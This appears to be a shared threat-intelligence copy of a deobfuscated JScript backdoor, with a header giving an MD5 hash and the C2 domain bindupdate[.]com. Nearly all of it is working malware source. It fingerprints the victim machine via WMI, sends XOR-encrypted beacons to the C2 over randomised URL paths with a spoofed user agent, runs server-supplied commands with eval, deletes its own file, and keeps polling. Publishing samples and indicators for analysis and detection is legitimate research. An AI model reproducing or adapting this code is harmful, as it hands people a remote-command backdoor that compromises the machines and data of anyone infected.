Permalink
May 23, 2019
Newer
100644
161 lines (155 sloc)
6.07 KB
1
/*
2
h/t @HONKONE_K
3
MD5: dcfa396e3f500d67afa7157adb639819
4
C2: bindupdate[.]com
5
*/
6
7
function anonymous() {
8
var ilurjolohm = "string";
9
var uhywimwofko = "User-Agent";
10
var hduzmalpomaq = "encrypt";
11
var cuxtusyxa = "POST";
12
var oswepogyg = "Content-Type";
13
var ijybynzuhb = "create_image";
14
var udwelysvusudf = "request";
15
var yzqopuhquqf = "https://bindupdate.com/";
16
var mykipfopwod = "_";
17
var nywwejfodupu = "";
18
var asybsadyml = "";
19
var jxatonahythy = "decrypt";
20
var xufuzqytfani = "group=zsoc._2205&rt=0&secret=fghedf43dsSFvm03&time=120000&uid=";
21
var mixohemo = "z";
22
var ofagepcablar = "Unknown";
23
var furfuvwuces = "&";
24
var awivegobd = "_";
25
var bimivqano = "&id=";
26
var fwocfisypfe = "application/x-www-form-urlencoded";
27
var ymcokwaxvihew = "get_image";
28
var ymjozrykigxu = "MSXML2.ServerXMLHTTP";
29
var idjuhruswiv = "content";
30
var awmydsywyhi = "decrypt";
31
var rpeclydyzjovi = "show_jpg";
32
var wqydixispo = "encrypt";
33
var apxopobzecxa = "images";
34
var idluzguqqykux = "WScript.Shell";
35
var qkafuzposy = "cdn";
36
var muxhypvuxmyrn = "Scripting.FileSystemObject";
37
var ijvilybzylde = "";
38
var yvdimugupuqf = "fetch";
39
var otpupvazlysgugs = "string";
40
var atvihufepce = "encrypt";
41
var mhukbudsawim = "/";
42
var oqabkiqyv = "POST";
43
var akrobinum = "?request=page";
44
var jofmyhubxemde = "show_png";
45
var ekitubecip = "kywzewfixu=";
46
var darovykqu = "image";
47
var ebahpyloqu = "create_logo";
48
var pniqexqipdixy = "winmgmts:root/CIMV2";
49
var fdoxwirunpu = "";
50
var amifadevga = "?request=content&id=";
51
var cyhjiryda = "request";
52
var ezredenyd = "no";
53
var ekoclyjiwi = "";
54
var ytynqicafuwb = "%APPDATA%";
55
var hytojbixduq = "show_ico";
56
var attesdoquxe = "action=get_command";
57
var owzafamuqj = "";
58
var ijyhnavaq = "no";
59
60
function id() {
61
var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true");
62
var lItems = new Enumerator(lrequest);
63
for (; !lItems.atEnd(); lItems.moveNext()) {
64
var mac = lItems.item().macaddress;
65
var dns_hostname = lItems.item().DNSHostName;
66
if (typeof mac === ilurjolohm && mac.length > 1) {
67
if (typeof dns_hostname !== ilurjolohm && dns_hostname.length < 1) {
68
dns_hostname = ofagepcablar;
69
} else {
70
for (var i = 0; i < dns_hostname.length; i++) {
71
if (dns_hostname.charAt(i) > mixohemo) {
72
dns_hostname = dns_hostname.substr(0, i) + mykipfopwod + dns_hostname.substr(i + 1);
73
}
74
}
75
}
76
return mac + mykipfopwod + dns_hostname;
77
}
78
}
79
}
80
81
function crypt_controller(type, request) {
82
var encryption_key = ekoclyjiwi;
83
if (type === awmydsywyhi) {
84
request = unescape(request);
85
var request_split = request.split(")*(");
86
request = request_split[0];
87
encryption_key = request_split[1].split(ekoclyjiwi);
88
} else {
89
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(ekoclyjiwi);
90
request = unescape(encodeURIComponent(request));
91
}
92
var output = new Array(request.length);
93
for (var i = 0; i < request.length; i++) {
94
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
95
output[i] = String.fromCharCode(charCode);
96
}
97
var result_string = output.join(ekoclyjiwi);
98
if (type === atvihufepce) {
99
result_string = result_string + ")*(" + encryption_key.join(ekoclyjiwi);
100
result_string = escape(result_string);
101
}
102
return result_string;
103
}
104
105
function get_path() {
106
var pathes = [apxopobzecxa, darovykqu, idjuhruswiv, yvdimugupuqf, qkafuzposy];
107
var files = [ebahpyloqu, ymcokwaxvihew, ijybynzuhb, hytojbixduq, jofmyhubxemde, rpeclydyzjovi];
108
var path = pathes[Math.floor(Math.random() * pathes.length)] + mhukbudsawim + files[Math.floor(Math.random() * files.length)];
109
return yzqopuhquqf + path;
110
}
111
112
function send_data(type, data, crypt) {
113
try {
114
var http_object = new ActiveXObject(ymjozrykigxu);
115
if (type === udwelysvusudf) {
116
http_object.open(oqabkiqyv, get_path() + akrobinum, false);
117
data = ekitubecip + crypt_controller(atvihufepce, xufuzqytfani + uniq_id + bimivqano + id() + furfuvwuces + data);
118
} else {
119
http_object.open(oqabkiqyv, get_path() + amifadevga + uniq_id, false);
120
if (crypt) {
121
data = crypt_controller(atvihufepce, data);
122
}
123
}
124
http_object.setRequestHeader(uhywimwofko, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/50.0");
125
http_object.setRequestHeader(oswepogyg, fwocfisypfe);
126
http_object.setOption(2, 13056);
127
http_object.send(data);
128
return http_object.responseText;
129
} catch (e) {
130
return ijyhnavaq;
131
}
132
}
133
134
function main() {
135
var ncommand = ekoclyjiwi;
136
ncommand = send_data(udwelysvusudf, attesdoquxe, true);
137
if (ncommand !== ijyhnavaq) {
138
try {
139
eval(crypt_controller(awmydsywyhi, ncommand));
140
} catch (e) {}
141
}
142
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
143
WScript.Sleep(random_knock);
144
main();
145
}
146
var first = false;
147
var shell = new ActiveXObject(idluzguqqykux);
148
var fso = new ActiveXObject(muxhypvuxmyrn);
149
var wmi = GetObject(pniqexqipdixy);
150
var uniq_id = new Date().getUTCMilliseconds();
151
var app_path = shell.expandEnvironmentStrings(ytynqicafuwb);
152
if (fso.GetFolder(app_path).Type.length > 5) {
153
fso.deleteFile(WScript.ScriptFullName);
154
try {
155
WScript.Sleep(120000);
156
main();
157
} catch (e) {
158
main();
159
}
160
}
161
}